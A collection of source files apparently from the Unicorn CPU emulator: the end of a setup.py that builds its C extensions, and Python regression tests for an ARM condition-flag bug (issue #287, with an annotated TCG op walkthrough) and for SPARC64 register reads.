        return super().run()


class CustomBuild(build_py):
    def run(self):
        if 'LIBUNICORN_PATH' in os.environ:
            log.info("Skipping building C extensions since LIBUNICORN_PATH is set")
        else:
            log.info("Building C extensions")
            build_libraries()
        return super().run()


setup(
    cmdclass={'build_py': CustomBuild, 'sdist': CustomSDist},
    has_ext_modules=lambda: True,  # It's not a Pure Python wheel,
    options={"bdist_wheel": {"py_limited_api": "cp37"}},  # to have ABI3 tagged wheel
)



import regress
from unicorn import *
from unicorn.arm_const import *

'''
    issue #287
    Initial Register States: R0=3, R1=24, R2=16, R3=0
    -----  code start -----
    CMP R0,R1,LSR#3        
    SUBCS R0,R0,R1,LSR#3   # CPU flags got changed in these two instructions, and *REMEMBERED*, now NF == VF == 0
    CMP R0,#1              # CPU flags changed again, now NF == 1, VF == 0, but they are not properly *REMEMBERED*
    MOV R1,R1,LSR#4
    SUBGES R2,R2,#4        # according to the result of CMP, we should skip this op
    
    MOVGE R3,#100          # since changed flags are not *REMEMBERED* in CMP, now NF == VF == 0, which result in wrong branch
                           # at the end of this code block, should R3 == 0 
    ----- code end ------

    # TCG ops are correct, plain op translation is done correctly, 
    # but there're In-Memory bits invisible from ops that control the host code generation.
    # all these codes are in one TCG translation-block, so wrong things could happen.
    # detail explanation is given on the right side.
    # remember, both set_label and brcond are point to refresh the dead_temps and mem_temps states in TCG
    ----- TCG ops  ------
            ld_i32 tmp5,env,$0xfffffffffffffff4
        movi_i32 tmp6,$0x0
        brcond_i32 tmp5,tmp6,ne,$0x0
        mov_i32 tmp5,r1	-------------------------
        movi_i32 tmp6,$0x3                     	|
        shr_i32 tmp5,r1,tmp6                   	|
        mov_i32 tmp6,r0                        	|
        sub_i32 NF,r0,tmp5                     	|
        mov_i32 ZF,NF				|
        setcond_i32 CF,r0,tmp5,geu   		|	# This part is "CMP R0,R1,LSR#3"
        xor_i32 VF,NF,r0			|----->	# and "SUBCS R0,R0,R1,LSR#3"
        xor_i32 tmp7,r0,tmp5			|	# the last op in this block, set_label get a chance to refresh the TCG globals memory states, 
        and_i32 VF,VF,tmp7			|	# so things get back to normal states
        mov_i32 tmp6,NF				|	# these codes are not affected by the bug. Let's called this Part-D
        movi_i32 tmp5,$0x0			|
        brcond_i32 CF,tmp5,eq,$0x1		|
        mov_i32 tmp5,r1				|
        movi_i32 tmp6,$0x3			|
        shr_i32 tmp5,r1,tmp6			|
        mov_i32 tmp6,r0				|
        sub_i32 tmp6,r0,tmp5			|   
        mov_i32 r0,tmp6        			|
        set_label $0x1	-------------------------         
        movi_i32 tmp5,$0x1	-----------------	# Let's called this Part-C
        mov_i32 tmp6,r0				|	# NF is used as output operand again!
        sub_i32 NF,r0,tmp5	----------------|----->	# but it is stated as Not-In-Memory,
        mov_i32 ZF,NF				|	# no need to sync it after calculation.
        setcond_i32 CF,r0,tmp5,geu		|	# the generated host code does not write NF
        xor_i32 VF,NF,r0			|	# back to its memory location, hence forgot. And the CPU flags after this calculation is not changed.
        xor_i32 tmp7,r0,tmp5			|	# Caution: the following SUBGES's condition check is right, even though the generated host code does not *REMEMBER* NF, it will cache the calculated result and serve SUBGES correctly
        and_i32 VF,VF,tmp7			|	  
        mov_i32 tmp6,NF				|
        mov_i32 tmp5,r1				|	# this part is "CMP R0,#1"
        movi_i32 tmp6,$0x4			|	# and "MOV R1,R1,LSR#4"
        shr_i32 tmp5,r1,tmp6			|	# and "SUBGES R2,R2,#4"
        mov_i32 r1,tmp5				|-----> # This is the part where problem start to arise
        xor_i32 tmp5,VF,NF			|
        movi_i32 tmp6,$0x0			|
        brcond_i32 tmp5,tmp6,lt,$0x2	--------|-----> # QEMU will refresh the InMemory bit for TCG globals here, but Unicorn won't
        movi_i32 tmp5,$0x4			|
        mov_i32 tmp6,r2				|	# this is the 1st bug-related op get analyzed.
        sub_i32 NF,r2,tmp5	----------------|-----> # here, NF is an output operand, it's flagged dead 
        mov_i32 ZF,NF				|	# and the InMemory bit is clear, tell the previous(above) ops
        setcond_i32 CF,r2,tmp5,geu		|	# if it is used as output operand again, do not sync it
        xor_i32 VF,NF,r2			|	# so the generated host-code for previous ops will not write it back to Memory
        xor_i32 tmp7,r2,tmp5			|	# Caution: the CPU flags after this calculation is also right, because the set_label is a point of refresh, make them *REMEMBERED*
        and_i32 VF,VF,tmp7			|	# Let's call this Part-B
        mov_i32 tmp6,NF				|
        mov_i32 r2,ZF				|
        set_label $0x2		-----------------
        xor_i32 tmp5,VF,NF	-----------------
        movi_i32 tmp6,$0x0			|
        brcond_i32 tmp5,tmp6,lt,$0x3		|	# Let's call this Part-A
        movi_i32 tmp5,$0x64			|	# if Part-B is not skipped, this part won't go wrong, because we'll check the CPU flags as the result of Part-B, it's *REMEMBERED*
        movi_i32 r3,$0x64			|-----> # but if Part-B is skipped,
        set_label $0x3				|	# what should we expected? we will check the condition based on the result of Part-D!!!
        call wfi,$0x0,$0,env			|	# because result of Part-C is lost. this is why things go wrong.
        set_label $0x0				|
        exit_tb $0x7f6401714013	-----------------
        ###########
    ----- TCG ends ------
'''

CODE = (
    b'\xa1\x01\x50\xe1'  # cmp 		r0, r1, lsr #3
    b'\xa1\x01\x40\x20'  # subhs 	r0, r0, r1, lsr #3
    b'\x01\x00\x50\xe3'  # cmp 		r0, #1
    b'\x21\x12\xa0\xe1'  # lsr 		r1, r1, #4
    b'\x04\x20\x52\xa2'  # subsge 	r2, r2, #4
    b'\x64\x30\xa0\xa3'  # movge 	r3, #0x64
)

BASE = 0x00000000


def show_regs(uc):
    regress.logger.debug('R0  : %08x', uc.reg_read(UC_ARM_REG_R0))
    regress.logger.debug('R1  : %08x', uc.reg_read(UC_ARM_REG_R1))
    regress.logger.debug('R2  : %08x', uc.reg_read(UC_ARM_REG_R2))
    regress.logger.debug('R3  : %08x', uc.reg_read(UC_ARM_REG_R3))
    regress.logger.debug('R4  : %08x', uc.reg_read(UC_ARM_REG_R4))
    regress.logger.debug('R5  : %08x', uc.reg_read(UC_ARM_REG_R5))
    regress.logger.debug('R6  : %08x', uc.reg_read(UC_ARM_REG_R6))
    regress.logger.debug('R7  : %08x', uc.reg_read(UC_ARM_REG_R7))
    regress.logger.debug('R8  : %08x', uc.reg_read(UC_ARM_REG_R8))
    regress.logger.debug('R9  : %08x', uc.reg_read(UC_ARM_REG_R9))
    regress.logger.debug('R10 : %08x', uc.reg_read(UC_ARM_REG_R10))
    regress.logger.debug('R11 : %08x', uc.reg_read(UC_ARM_REG_R11))
    regress.logger.debug('R12 : %08x', uc.reg_read(UC_ARM_REG_R12))
    regress.logger.debug('SP  : %08x', uc.reg_read(UC_ARM_REG_SP))
    regress.logger.debug('LR  : %08x', uc.reg_read(UC_ARM_REG_LR))
    regress.logger.debug('PC  : %08x', uc.reg_read(UC_ARM_REG_PC))

    flags = uc.reg_read(UC_ARM_REG_CPSR)

    regress.logger.debug('carry    : %d', (flags >> 29) & 0b1)
    regress.logger.debug('overflow : %d', (flags >> 28) & 0b1)
    regress.logger.debug('negative : %d', (flags >> 31) & 0b1)
    regress.logger.debug('zero     : %d', (flags >> 30) & 0b1)


class TestIssue287(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_ARM, UC_MODE_ARM)

        uc.mem_map(BASE, 0x1000)

        uc.reg_write(UC_ARM_REG_SP, 0x40000)
        uc.reg_write(UC_ARM_REG_R0, 3)
        uc.reg_write(UC_ARM_REG_R1, 24)
        uc.reg_write(UC_ARM_REG_R2, 16)
        uc.reg_write(UC_ARM_REG_R3, 0)
        uc.mem_write(BASE, CODE)

        uc.emu_start(BASE, len(CODE))

        show_regs(uc)

        self.assertEqual(0, uc.reg_read(UC_ARM_REG_R3))


if __name__ == '__main__':
    regress.main()



import regress
from unicorn import *
from unicorn.sparc_const import *

CODE = (
    b"\xb0\x06\x20\x01"  # 0: b0 06 20 01     inc  %i0
    b"\xb2\x06\x60\x01"  # 4: b2 06 60 01     inc  %i1
)

BASE = 0x00000000


class TestSparc64RegRead(regress.RegressTest):
    def runTest(self):
        uc = Uc(UC_ARCH_SPARC, UC_MODE_SPARC64 | UC_MODE_BIG_ENDIAN)

        uc.mem_map(BASE, 0x1000 ** 2)
        uc.mem_write(BASE, CODE)

        uc.reg_write(UC_SPARC_REG_SP, 100)

        uc.emu_start(BASE, BASE + len(CODE), count=2)

        regress.logger.debug('sp = %#x', uc.reg_read(UC_SPARC_REG_SP))
        regress.logger.debug('i0 = %#x', uc.reg_read(UC_SPARC_REG_I0))
        regress.logger.debug('i1 = %#x', uc.reg_read(UC_SPARC_REG_I1))


if __name__ == '__main__':
    regress.main()
